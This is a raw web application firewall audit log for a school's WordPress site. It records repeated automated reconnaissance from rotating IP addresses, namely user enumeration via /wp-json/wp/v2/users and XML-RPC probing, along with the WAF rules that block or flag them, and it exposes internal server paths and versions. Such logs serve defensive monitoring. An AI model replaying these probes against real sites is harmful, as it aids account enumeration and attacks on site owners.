type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441733688277 5723 (- - -) Stopwatch2: 1747441733688277 5723; combined=4164, p1=537, p2=3406, p3=32, p4=35, p5=92, sr=77, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5db8dd4b-Z-- --6619750f-A-- [17/May/2025:07:29:35 +0700] aCfYb3yxdQCiyU1ENFcm-AAAABA 103.236.140.4 42818 103.236.140.4 8181 --6619750f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6619750f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6619750f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441775094771 2914 (- - -) Stopwatch2: 1747441775094771 2914; combined=1189, p1=424, p2=739, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6619750f-Z-- --fb8f7f14-A-- [17/May/2025:07:29:40 +0700] aCfYdHyxdQCiyU1ENFcm-QAAABE 103.236.140.4 42822 103.236.140.4 8181 --fb8f7f14-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.203 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fb8f7f14-C-- demo.sayHello --fb8f7f14-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb8f7f14-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441780889587 5337 (- - -) Stopwatch2: 1747441780889587 5337; combined=4013, p1=527, p2=3272, p3=29, p4=32, p5=91, sr=76, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb8f7f14-Z-- --92b8d656-A-- [17/May/2025:07:30:30 +0700] aCfYpnyxdQCiyU1ENFcm-wAAABI 103.236.140.4 42826 103.236.140.4 8181 --92b8d656-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --92b8d656-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92b8d656-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441830867911 2682 (- - -) Stopwatch2: 1747441830867911 2682; combined=1089, p1=386, p2=680, p3=0, p4=0, p5=23, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92b8d656-Z-- --daae8838-A-- [17/May/2025:07:30:39 +0700] aCfYr-m4kjNN-hEbWjJAvAAAAEw 103.236.140.4 42834 103.236.140.4 8181 --daae8838-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.125 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --daae8838-C-- demo.sayHello --daae8838-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --daae8838-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441839167837 6818 (- - -) Stopwatch2: 1747441839167837 6818; combined=4928, p1=626, p2=3888, p3=38, p4=43, p5=182, sr=83, sw=151, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daae8838-Z-- --a8c0a31d-A-- [17/May/2025:07:33:08 +0700] aCfZRHyxdQCiyU1ENFcnAQAAAAQ 103.236.140.4 42846 103.236.140.4 8181 --a8c0a31d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a8c0a31d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8c0a31d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441988430882 2824 (- - -) Stopwatch2: 1747441988430882 2824; combined=1259, p1=449, p2=779, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8c0a31d-Z-- --4776230f-A-- [17/May/2025:07:33:13 +0700] aCfZSXyxdQCiyU1ENFcnBAAAAAg 103.236.140.4 42854 103.236.140.4 8181 --4776230f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.148 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4776230f-C-- demo.sayHello --4776230f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4776230f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441993833388 6103 (- - -) Stopwatch2: 1747441993833388 6103; combined=4712, p1=571, p2=3897, p3=39, p4=43, p5=97, sr=75, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4776230f-Z-- --1396b23f-A-- [17/May/2025:07:36:33 +0700] aCfaEXyxdQCiyU1ENFcnDAAAAAE 103.236.140.4 42882 103.236.140.4 8181 --1396b23f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1396b23f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1396b23f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442193851111 2992 (- - -) Stopwatch2: 1747442193851111 2992; combined=1360, p1=471, p2=859, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1396b23f-Z-- --ecc65b19-A-- [17/May/2025:07:36:39 +0700] aCfaF3yxdQCiyU1ENFcnDgAAAAM 103.236.140.4 42886 103.236.140.4 8181 --ecc65b19-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.247 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ecc65b19-C-- demo.sayHello --ecc65b19-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecc65b19-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442199443950 4484 (- - -) Stopwatch2: 1747442199443950 4484; combined=3554, p1=431, p2=2893, p3=23, p4=24, p5=105, sr=67, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecc65b19-Z-- --ddd22e48-A-- [17/May/2025:07:36:56 +0700] aCfaKHyxdQCiyU1ENFcnDwAAAAQ 103.236.140.4 42890 103.236.140.4 8181 --ddd22e48-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ddd22e48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ddd22e48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442216277733 2894 (- - -) Stopwatch2: 1747442216277733 2894; combined=1265, p1=450, p2=785, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ddd22e48-Z-- --0c2af94d-A-- [17/May/2025:07:37:00 +0700] aCfaLOm4kjNN-hEbWjJAwQAAAFI 103.236.140.4 42894 103.236.140.4 8181 --0c2af94d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0c2af94d-C-- demo.sayHello --0c2af94d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c2af94d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442220725350 4751 (- - -) Stopwatch2: 1747442220725350 4751; combined=3658, p1=456, p2=3002, p3=23, p4=26, p5=89, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c2af94d-Z-- --fe8c904b-A-- [17/May/2025:07:37:45 +0700] aCfaWem4kjNN-hEbWjJAwwAAAFU 103.236.140.4 42902 103.236.140.4 8181 --fe8c904b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fe8c904b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe8c904b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442265886939 2783 (- - -) Stopwatch2: 1747442265886939 2783; combined=1245, p1=437, p2=779, p3=0, p4=0, p5=29, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe8c904b-Z-- --4b84436c-A-- [17/May/2025:07:37:51 +0700] aCfaXxKi5m5upc8uMd6hzwAAAMQ 103.236.140.4 42912 103.236.140.4 8181 --4b84436c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4b84436c-C-- demo.sayHello --4b84436c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b84436c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442271410777 5402 (- - -) Stopwatch2: 1747442271410777 5402; combined=4051, p1=536, p2=3300, p3=29, p4=31, p5=92, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b84436c-Z-- --6b1b8533-A-- [17/May/2025:07:38:29 +0700] aCfahXyxdQCiyU1ENFcnFAAAAAw 103.236.140.4 42924 103.236.140.4 8181 --6b1b8533-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.24 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.24 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6b1b8533-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b1b8533-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442309377091 2778 (- - -) Stopwatch2: 1747442309377091 2778; combined=1413, p1=480, p2=902, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b1b8533-Z-- --078ea459-A-- [17/May/2025:07:38:32 +0700] aCfaiBKi5m5upc8uMd6h0gAAAMg 103.236.140.4 42928 103.236.140.4 8181 --078ea459-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.35 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --078ea459-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --078ea459-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442312946588 2374 (- - -) Stopwatch2: 1747442312946588 2374; combined=1100, p1=379, p2=693, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --078ea459-Z-- --6933bd18-A-- [17/May/2025:07:38:37 +0700] aCfajXyxdQCiyU1ENFcnFQAAABE 103.236.140.4 42930 103.236.140.4 8181 --6933bd18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.24 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.24 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6933bd18-C-- demo.sayHello --6933bd18-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6933bd18-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442317742079 5022 (- - -) Stopwatch2: 1747442317742079 5022; combined=3873, p1=501, p2=3165, p3=24, p4=30, p5=91, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6933bd18-Z-- --87888b7d-A-- [17/May/2025:07:38:43 +0700] aCfak3yxdQCiyU1ENFcnFwAAABI 103.236.140.4 42936 103.236.140.4 8181 --87888b7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.35 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87888b7d-C-- demo.sayHello --87888b7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87888b7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442323770375 6147 (- - -) Stopwatch2: 1747442323770375 6147; combined=4369, p1=562, p2=3563, p3=40, p4=44, p5=96, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
